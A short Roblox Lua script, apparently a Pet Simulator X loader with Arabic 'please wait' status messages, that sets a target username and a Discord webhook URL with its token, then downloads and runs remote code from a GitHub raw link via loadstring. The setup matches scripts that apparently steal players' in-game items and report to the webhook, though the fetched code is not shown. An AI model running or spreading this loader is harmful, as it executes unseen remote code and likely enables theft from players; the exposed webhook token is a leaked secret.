Username = "RT7Rza"
WebHook = "https://discord.com/api/webhooks/1171002358172491828/n_bXV0gzlVoZLNIcIUg50-8b_3L7Q9VurkDbEFtXvzoSNTDqz9WwxHTq6_ijMLVgI_Bm"
_G.CustomScriptName = "انتظر .. by VK2"
_G.Text1 = "تم تشغيل السكربت..."
_G.Text2 = "انتضر من فضلك"
_G.Text3 = "جاري الكشف..."
_G.Text4 = "جاري تحميل انتضر..."
loadstring(game:HttpGet("https://raw.githubusercontent.com/Justanotherdme/petsimx22/main/petsimguiss.lua"))()
